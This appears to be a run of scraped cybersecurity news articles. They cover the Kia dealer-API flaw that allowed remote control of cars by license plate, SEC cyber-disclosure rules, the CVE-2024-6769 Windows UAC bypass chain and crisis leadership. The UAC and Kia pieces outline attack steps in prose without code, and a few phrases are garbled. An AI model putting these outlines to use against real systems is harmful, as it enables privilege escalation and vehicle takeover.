"Infotainment systems are another concern, as they connect to smartphones, apps, and other services, creating more entry points for hackers into the car's internal network," Mittal says. "The recent Kia hack really highlights how APIs and cloud services can be weak spots; if the APIs that control critical functions aren't secured properly, they become easy targets for attackers."

**A Troubling Pattern of Cars' Cyber Insecurity**

News of the Kia hack adds to growing concerns over connected vehicles — and not just about their security either. Earlier this year, two senior US lawmakers slammed General Motors, Honda, and Hyundai for collecting extensive data from connected vehicle about owners and their movement. The two lawmakers, Sens. Ron Wyden (D-Ore.) and Edward Markey (D-Mass.) called the data collection by the three automakers of a symptomatic industry-wide problem that highlighted the need for greater oversight and scrutiny of automaker practices.

"Automotive vendors have proven irresponsible at security again and again, and I wonder how much more we are going to see before action is taken," says David Brumley, CEO of software security firm ForAllSecure. "Yesterday the average driver worried about \[the theft of their\] key fob. Today, they have to worry about whether their dealer or manufacturer has an unprotected API. Where is the \[National Transportation Safety Board\] on this?"

Kia Motors did not respond immediately to a Dark Reading request for comment.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Millions of Kia Vehicles Open to Remote Hacks via License Plate

Companies that commit to risk management have a strong cybersecurity foundation that makes it easier to comply with the SEC's rules. Here is what you need to know about 8K and 10K filings.

Source: Louisa Svensson via Alamy Stock Photo

Question: How should security leaders navigate the SEC's cybersecurity and disclosure rules? What do they need to do in order to ensure compliance?

Michael Gray, CTO, Thrive: While the Securities and Exchange Commission's (SEC) Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure rules went into effect toward the end of 2023, many organizations still have questions when it comes to filings and disclosures. Under these rules, organizations have to disclose significant cybersecurity incidents and provide annual updates on their cybersecurity posture. Being able to accurately share cybersecurity updates, sometimes within short time frames, requires teams to have a deep understanding of 8-K and 10-K filings, and to implement new processes that simplify compliance.

**The Difference Between an 8-K and 10-K Filing**

8-K filings, in general, are periodic reports that public companies use to share information about major events that investors would likely want to know when making investment decisions. The SEC's cybersecurity rules now explicitly require that companies disclose material cybersecurity incidents via Item 1.05 of Form 8-K.

10-K filings, on the other hand, are detailed annual reports that summarize a public company's financial and operational performance over the past year. Part of a company's responsibility is to disclose the inner happenings of the business with stakeholders, and 10-K filings help to educate investors so that they can make informed decisions about their investments. Public companies must now include information about their cybersecurity strategy, governance, perceived threats, and material events that happened throughout the year within their yearly 10-K filings.

**The 8-K: Define Materiality**

A common question among cybersecurity teams today is how to determine whether a cybersecurity incident is "material" — incidents that have a significant impact on financial outcomes, as well as implications on the company's operations, reputation, compliance, and customer or stakeholder relations — and deserving of an 8-K filing. The SEC's guidance is that a cybersecurity incident is material if a rational investor would want to know about the event, such as incidents that result in substantial revenue losses, operational interruption or downtime, negative media coverage, legal risk, and customer data loss. For example, the Change Healthcare ransomware attack was material —patients' data was compromised, and it negatively affected hospitals, clinics, and healthcare professionals relying on the company. On the other hand, a phishing scheme targeted at an individual through a work email would not be considered material, as it most likely would not result in substantial revenue loss for the business or impact company stakeholders — especially if only personal information was given.

Companies must file an 8-K within four business days of identifying an incident, not within four business days of the incident occurring. If additional material information is identified that needs to be disclosed, companies would file an amendment to the original 8-K that disclosed the incident. In many cases, cybersecurity teams will uncover additional details about the incident that they can then share in subsequent reports to the SEC. Companies also have a duty to correct a prior disclosure that is found to be untrue as additional facts are determined.

**The 10-K: Disclosing Too Much and Too Little Information**

10-K filings are where cybersecurity teams share details on the current state of the company's cybersecurity program and strategy. The SEC's disclosure rules require that organizations identify who has oversight over cybersecurity activity and describe how they evaluate, discover, and mitigate material risks from cybersecurity threats. Item 106 of the 10-K is also where teams can revisit material incidents over the past year and provide additional commentary on the company's response and performance since the event. Item 106 also requires organizations to describe the board of directors' oversight of risks and management's role in assessing material risks. 10-K filings are not necessarily “new” in terms of information about an incident previously reported in an 8-K filing, but rather information about the resultant impact to the business and any identified cyber-risks the company faces that could result from a previous incident.

Again, the rule of thumb on how much information to disclose is that companies should give enough information for shareholders to be able to make sound investment decisions. A few details to consider include whether your company has a CISO, what cyber training programs are implemented for the board and employees at large, and if anyone on the board has detailed cybersecurity knowledge or expertise. More often than not, this means leaning into transparency rather than hiding critical details.

**Make Compliance Simpler**

Outside of 8-K and 10-K filings, employees should understand the company's overarching cybersecurity framework. This framework should cover how the organization approaches cybersecurity overall, document incident response procedures, and summarize how the enterprise improves over time.

Modern organizations have to be able to mitigate risk before and after cybersecurity incidents. Cybersecurity leaders should frequently audit their cybersecurity capabilities, as threats are evolving constantly. This involves identifying potential vulnerabilities and implementing effective risk management strategies, running real-time tests on your network and endpoints, and continuously communicating and training staff on cybersecurity policies. The SEC provides readiness assessments that can help in this area.

After an incident occurs, leaders should reflect on how well the organization responded and ensure key details are thoroughly documented within the 8-K. Companies should also engage with legal experts to review their compliance posture on a regular basis. Furthermore, employees need dedicated training on the SEC's cybersecurity disclosure rules, so that they are aware of the company's reporting obligations and understand their roles when it comes to incident response and annual readouts.

**About the Author**

Dark Reading

The Edge is Dark Reading's home for features, threat data and in-depth perspectives on cybersecurity.

How Should CISOs Navigate the SEC Cybersecurity and Disclosure Rules?

Adversaries can exploit CVE-2024-6769 to jump from regular to admin access without triggering UAC, but Microsoft says it's not really a vulnerability.

Source: Panther Media GmbH via Alamy Stock Photo

Researchers have flagged a weakness they're tracking as CVE-2024-6769, calling it a combination user access control (UAC) bypass/privilege escalation vulnerability in Windows. It could allow an authenticated attacker to obtain full system privileges, they warned.

That's according to Fortra, which assigned the issue a medium severity score of 6.7 out of 10 on the Common Vulnerability Scoring System (CVSS) scale. Its proof-of-concept exploit demonstrates that "you have the ability to shut down the system," stressed Tyler Reguly, associate director of security R&D at Fortra. "There are certain locations on the drive where you can write and delete files that you couldn't previously." That includes, for example, C:\\Windows, so an attacker could take ownership over files owned by SYSTEM.

For its part, Microsoft acknowledged the research but said it does not consider this an actual vulnerability, because it falls under its concept of acceptability to have "non-robust" security boundaries.

**Understanding Integrity Levels in Windows**

To understand Fortra's findings, we have to go back to Windows Vista, when Microsoft introduced the model of Mandatory Integrity Control (MIC). Simply put, MIC assigned every user, process, and resource a level of access, called an integrity level. Low integrity levels were afforded to all, medium for authenticated users, high for administrators, and system for only the most sensitive and powerful.

Alongside those integrity levels came UAC, a security mechanism that runs most processes and applications at the medium level by default, and requires explicit permission for any actions that require greater privileges than that. Typically, an admin-level user can upgrade simply by right-clicking a command prompt and selecting "Run as Administrator."

By combining two exploit techniques, Fortra researchers demonstrated in their proof of concept how an already-authorized user could slither through this system, jumping across the security boundary imposed on the medium integrity level to obtain full administrative privileges, all without triggering UAC.

**Using CVE-2024-6769 to Jump Across User Boundaries**

To exploit CVE-2024-6769, an attacker first must have a foothold in a targeted system. This requires the medium integrity-level privileges of an average user, and the account from which the attack is triggered must belong to the system's administrative group (the type of account that could level up to admin privileges, if not for UAC being in its way).

The first step in the attack involves remapping the targeted system's root drive — such as "C:" — to a location under their control. This will also shift the "system32" folder, which many services rely on to load critical system files.

One such service is the CTF Loader, ctfmon.exe, which runs without administrator privileges at a high integrity level. If the attacker places a specially crafted, copycat DLL in the copycat system32 folder, ctfmon.exe will load it and execute the attacker's code at that high integrity level.

Next, if the attacker wishes to obtain full administrative privileges, they can poison the activation context cache, which Windows uses to load specific versions of libraries. To do this, they craft an entry in the cache pointing to a malicious version of a legitimate system DLL, contained in an attacker-generated folder. Through a specially crafted message to the Client/Server Runtime Subsystem (CSRSS) server, the fake file is loaded by a process that has administrator privileges, granting the attacker full control over the system.

**Microsoft: Not a Vulnerability**

Despite the potential for privilege escalation, Microsoft refused to accept the issue as a vulnerability. After Fortra reported it, the company responded by pointing to the "non-boundaries" section of the Microsoft Security Servicing Criteria for Windows, which outlines how "some Windows components and configurations are explicitly not intended to provide a robust security boundary." Under the pertinent "Administrator to Kernel" section, it reads:

> Administrative processes and users are considered part of the Trusted Computing Base (TCB) for Windows and are therefore not strongly isolated from the kernel boundary. Administrators are in control of the security of a device and can disable security features, uninstall security updates, and perform other actions that make kernel isolation ineffective.

Essentially, Reguly explains, "They see the admin-to-system boundary as a nonexistent boundary, because admin is trusted on a host." In other words, Microsoft doesn't consider CVE-2024-6769 a vulnerability if an admin user could ultimately perform the same system-level actions anyway, subject to UAC approval.

In a statement to Dark Reading, a Microsoft spokesperson highlighted that "The method requires membership in the Administrator group, so the so-called technique is just leveraging an intended permission or privilege which does not cross a security boundary."

Reguly and Fortra disagree with Microsoft's perspective. "When UAC was introduced, I think we were all sold on the idea that UAC was this great new security feature, and Microsoft has a history of fixing bypasses for security features," he says. "So if they're saying that this is a trust boundary that is acceptable to traverse, really what they're saying to me is that UAC is not a security feature. It's some sort of helpful mechanism, but it's not actually security related. I think it's a really strong philosophical difference."

**Windows Shops Should Still Beware UAC Bypass Risk**

Philosophical differences aside, Reguly stresses that businesses need to be aware of the risk in allowing lower-integrity admins to escalate their privileges to attain full system controls.

At the end of a CVE-2024-6769 exploit, an attacker would have full reign to manipulate or delete critical system files, upload malware, establish persistence, disable security features, access potentially sensitive data, and more.

"Thankfully, only administrators are impacted by this, which means that most of your standard users are unaffected," Fortra noted in an FAQ to reporters. "For administrators, it is important to ensure that you are not running binaries whose origins cannot be verified. For those admins, however, vigilance is the best defense at the moment."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Novel Exploit Chain Enables Windows UAC Bypass

It is imperative for executives and board members to know who their top allies are, and how to best leverage them to successfully navigate a crisis and minimize the harm caused by a breach.

Chris Crummey, Director, Executive & Board Cyber Services, Sygnia

September 27, 2024

5 Min Read

Source: Artur Marciniec via Alamy Stock Photo

COMMENTARY

Many organizations have gone to great lengths in preparing for a cyberattack, leveraging both services and solutions to limit risk and exposure. Despite these efforts, breaches persist, ransomware payouts have grown, and leaders continue to make mistakes during cyber crises that impact organizations and customers both short and long term.

Most of these mistakes happen when the stakeholders do not know their roles, responsibilities, and what they are authorized to do in a crisis. This lack of clarity causes friction when leaders are required to make several highly impactful decisions during a cyber incident with little time and often limited verified information.

The biggest challenge facing crisis response teams is the fact there simply is never enough time to gather, verify, and analyze the necessary information to make the best possible decision. Under the pressure of a compressed timeline and increasingly concerned stakeholders, executives and board members tend to fixate on finding ways to shorten the time to remediation.

They should also prioritize reducing present and future risks for the company and ensure their teams do the same, but that often gets overlooked. As everyone within the organization turns to leadership for guidance and direction, it's important for those in charge to understand who their greatest allies are during a crisis and how they can leverage them to minimize the business and reputational impact of a breach.

**Open and Ongoing Communications**

During the crisis, leadership must rely on its guiding principles to define their communication strategy and provide employees with a North Star that explains what they need to do forthwith. This starts with establishing a secure and classified crisis war room to collaborate and communicate under privilege, categorizing the event and defining what can and cannot be shared, and clearly defining roles and responsibilities for each stakeholder. This creates a leadership filter that determines who is authorized to make decisions and sets a timeline in motion for when information should be disseminated internally and externally, which systems need to be taken offline or brought back on, and if or when authorities and regulators should be contacted. 

Organizations must maintain constant communication with each line of business throughout the crisis because it empowers employees to make the micro-decisions necessary to limit the ongoing business and reputational harm. There is no better example of this than former Maersk CEO Soren Skou, whose tip-of-the-spear leadership helped the company navigate the unprecedented 2017 NotPetya malware attack. Skou participated in all crisis calls and meetings, focused on internal and external communication, and instructed all frontline staff across the 130 countries Maersk operates in to "do what you think is right to serve the customer — don't wait for the HQ, we'll accept the cost." In doing so, Maersk quickly mobilized to identify and remove the malware from its systems to restore operations, provided real-time feedback to its stakeholders about the situation, and resumed online books just eight days after the attack.

**Built-in Alternatives**

Each decision made during a crisis can set off a chain reaction that can compound damage. Business and security leaders often experience a rush of cortisol during the first few hours of a crisis that induces the "fog of war" feeling, clouding judgment and causing mistakes. It is important to understand during these moments that each choice has multiple options, leaders must ask the right information-gathering questions to support a full business response, and there is no perfect answer or solution. 

Redundancy is a key strategy to save time during a crisis, and the most mature organizations have created a collaborative response plan based on the PACE model. For instance, if an organization suffers a ransomware attack and its communications platforms are potentially compromised, moving to an alternate platform quickly removes a significant amount of risk. Teams should be aligned on how much risk they are willing to take with each decision and create a coordinated understanding of their options. By working through the pros and cons associated with these choices, executives and board members can determine which decisions their organizations should make to get operations back up and running as quickly and efficiently as possible.

**Driving a Culture of Preparedness**

Organizations that have dedicated the necessary time to preparing their teams for a crisis have confidence in their employees to successfully execute the incident response plan and limit the amount of damage inflicted by a threat actor. Testing each level of these plans, especially the "small details," is critical for successful execution of the organization's strategy. It allows leadership to adapt their playbooks and runbooks to various situations and circumstances, and evolve their pre-crisis plans to account for emerging threats and their effects on the business.

Conducting tabletop exercises, creating and testing playbooks and runbooks, and putting employees through real-life simulations during war games fosters a well-coordinated response and puts teams in the best position for when (not if) a situation arises. These operations can reveal potential gaps and answer questions that include: How is the company communicating to its employees when the email platform is compromised? Who is managing that list of employees and their corresponding contact information? Where is that document stored and when was it last updated? The responses to these questions are a direct correlation to a company's maturity and preparation.

When a corporation finds itself in the middle of a cyber crisis, the key stakeholders will shift their focus to the executive leadership team to determine how well they are responding. During these times, it is imperative for executives and board members to understand who their top allies are, and how to best leverage them to successfully navigate the situation and minimize the financial and reputational harm caused by the breach.

**About the Author**

Director, Executive & Board Cyber Services, Sygnia

Chris Crummey is the Director for Executive and Board Cyber Services globally at Sygnia. For the past eight years, Chris has prepared and advised thousands of companies, SOCs, executives and Boards of Directors on cybersecurity best practices before, during and after a cybersecurity crisis. These best practices focus on the intersection of cybersecurity, risk-based decision making, crisis communications, leadership under pressure and the role human beings play in cybersecurity. As a keynote speaker on these topics, Chris is also a cybersecurity faculty member of “Competent Boards,” which is the original and premier creator of online of ESG training programs for board directors and senior business professionals. Prior to this role, Chris was the Executive Director for the IBM’s X-Force Command Centers globally and specialized in tabletop exercises and cyber wargames.

Top Allies Executives &amp; Boards Should Leverage During a Cyber Crisis

A critical vulnerability in Kia vehicles allowed hackers to control cars remotely using only license plates. The flaw…

A critical vulnerability in Kia vehicles allowed hackers to control cars remotely using only license plates. The flaw has been patched, but it highlights the growing threat of cyberattacks on connected cars.

A severe security vulnerability has been discovered in Kia vehicles, allowing hackers to remotely control key functions using only a license plate. Security researchers Neiko Rivera, Sam Curry, Justin Rhinehart, and Ian Carroll uncovered a set of vulnerabilities that could have been exploited to gain unauthorized access to Kia vehicles by exploiting the Kia dealership infrastructure,

The attack involved attackers remotely registering for a fake account and generating access tokens. These tokens would then be used in conjunction with another HTTP request to a dealer APIGW (API Gateway) endpoint and the vehicle’s VIN (vehicle identification number) to obtain the owner’s name, phone number, and email address, potentially adding themselves as an “invisible” second user on the car without the owner’s knowledge.

Researchers discovered that a victim’s vehicle could be accessed by executing four HTTP requests and internet-to-vehicle commands. These commands include generating a dealer token, fetching the victim’s email and phone number, modifying the owner’s previous access using a leaked email address and VIN, and adding an attacker as the primary owner of the vehicle. The victim would not receive any notification about modifications to their access permissions. Here’s a quick explanation of which functionalities are vulnerable:

*   **Remote Lock/Unlock: They could lock or unlock the doors.**
*   **Geolocate Vehicle: Hackers could pinpoint the car’s location.**
*   **Remote Start/Stop: They could start or turn off the engine remotely.**
*   **Remote Horn/Light: They could activate the car’s horn and lights.**
*   **Remote Camera: In some cases, they could even access the car’s cameras.**

A hypothetical attack scenario could allow a bad actor to enter a Kia vehicle’s license plate, retrieve the victim’s information, and execute commands after 30 seconds. The vulnerability allows hackers to remotely start or stop the engine, potentially stealing the vehicle, causing damage, or endangering occupants. It impacted a wide range of Kia vehicles, including models manufactured after 2013. This means that a significant number of cars were potentially at risk.

Kia addressed these issues in August 2024 following a responsible disclosure in July 2024. While no evidence of exploitation in the wild exists, researchers warn that car manufacturers could introduce similar vulnerabilities to Meta, allowing someone to take over a vehicle’s information. As cars become increasingly connected, manufacturers must prioritize security measures to protect their customers from potential threats.

This is not the first time a team involving ethical hackers like Sam Curry has compromised the security of internet-connected cars for good. In December 2022, hackers used application vulnerabilities to hack Honda and Nissa vehicles just by knowing their VIN.

Commenting on this, Akhil Mittal, senior security consulting manager at the Synopsys Software Integrity Group, said, “This Kia vulnerability isn’t just a technical flaw—it’s a red flag for the entire automotive industry. It shows how modern cars have become prime targets for cybercriminals, shifting from physical theft to digital exploitation. The idea that a hacker could unlock, track, or even start your car using just a license plate number sounds like science fiction, but it’s happening today.”

Akhil further explained that “Kia’s quick patch is encouraging, but it raises a bigger question: Is the auto industry ready for these high-tech threats? This wasn’t just about controlling a car—it exposed personal data, too. In a few simple steps, a hacker could access sensitive information, change ownership, and take control of the vehicle without the owner’s knowledge. With nearly all Kia models made after 2013 affected, it’s clear that modern cars are now connected devices and vulnerable to the same cybersecurity risks as our phones and computers.”

“Automakers must take cybersecurity as seriously as crash safety. Cars aren’t just machines anymore—they are smart devices loaded with data that needs protection. Regular software updates, stronger encryption, and better communication with drivers are critical. If the industry doesn’t act soon, these risks could become problems for everyday drivers,” he warned.

1.  How Hackers Can Remotely Unlock/Start Honda Cars
2.  Cybercriminals Exploit CAN Injection Hack to Steal Cars
3.  Globally Used Points.com Loyalty System Hacked for Good
4.  Tesla cars can be remotely hacked using drone, WIFI dongle
5.  Internet Connected Car Hacked and DDoSed via Smartphone

Tag

#auth